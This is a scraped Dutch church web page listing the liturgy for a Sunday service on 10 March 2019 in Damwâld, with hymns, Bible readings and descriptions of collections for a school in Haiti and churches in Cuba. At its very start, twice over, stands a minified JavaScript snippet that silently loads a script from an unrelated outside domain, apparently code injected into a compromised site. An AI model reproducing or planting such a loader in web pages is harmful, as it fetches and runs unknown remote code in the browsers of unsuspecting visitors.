;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 10 maart 2019 9:30 uur - PKN Damwâld
zondag 10 maart 2019
09:30 uur

Kerkdienst zondag 10 maart 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Ivo van Hijum
Liturgie
Lied voor de dienst Psalm 100 : 1 en 2
Welkom
Intochtslied Psalm 118 : 2 en 7
Stil gebed, Votum en groet
We zingen: Gez.179:1 en 3
Wetslezing .
We zingen: Ps.32:1 en 3
Gebed
We lezen: Ezechiël 47
We zingen: Elb 150 : 1
We lezen: Lucas 10 : 1-22
We zingen: Elb 150 : 3
Preek .
We zingen: Gez.120: 1 en 3
Dankzegging en voorbede
Collecte
We zingen: Opw 546
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting naar school in Haïti

Stichting naar School in Haïti is opgericht door Marijke Zaalberg in december 1998. Marijke heeft van oktober 1995 tot juli 1998 gewerkt in opvanghuizen in Guatemala en Haïti, zij werkte met kinderen van alle leeftijden. Sinds 1998 is Marijke Zaalberg actief in de bergen buiten Port au Prince met het verzorgen van basisonderwijs. In maart 1999 had zij een klasje in de woonkamer van een gehuurd huis in Kenscoff en kregen 24 ondervoede kinderen elke dag een maaltijd en onderwijs. Dit initiatief is inmiddels uitgegroeid tot scholen op twee locaties waar momenteel ruim 800 leerlingen onderwijs krijgen van groep één tot en met de derde klas middelbare school. De scholen bevinden zich in het berggebied ten zuiden van Port au Prince. In Kablain staat het hoofdgebouw met in totaal 16 klaslokalen, vier houten kleuterlokalen, een schoolkeuken, een moestuin en een eigen watervoorziening. Er is een vrijwilligershuis en een kindertehuis bovenop de school. Hier worden incidenteel kinderen opgevangen, waarvoor de ouders de zorg (tijdelijk) niet meer op zich kunnen nemen. Tevens woont Marijke bovenop de school. Marijke Zaalberg ontvangt voor haar werk geen salaris of andere vergoeding. Gemiddeld is Marijke negen maanden per jaar in Haïti.

Tweede collecte: Kerk
Uitganscollecte: Kerk zijn in Woord en Daad

Jarenlang hebben Cubaanse Kerken onder het communisme een sluimerend bestaan geleid. Nu het communistische systeem in z'n voegen kraakt, zoekt de bevolking naar houvast: kerken groeien. Door de verslechterende economie neemt ook de armoede toe. Om als Kerk beter voorbereid te zijn op een groeiende (diaconale) taak is er veel behoefte aan kennis over de Bijbel, theologie en diaconaat. De Kerk wil er zijn voor ouderen die het niet breed hebben, voor zieken en kinderen met een problematische thuissituatie. Kerk in Actie ondersteunt kerken, predikanten en vrijwilligers in Cuba met theologisch onderwijs en helpt kerken diaconale activiteiten op te zetten. Met de opbrengst van deze Voorjaarszendingscollecte steunt Kerk in Actie zendingsprojecten zoals de kerken op Cuba, zodat zij in woord en daad kunnen getuigen.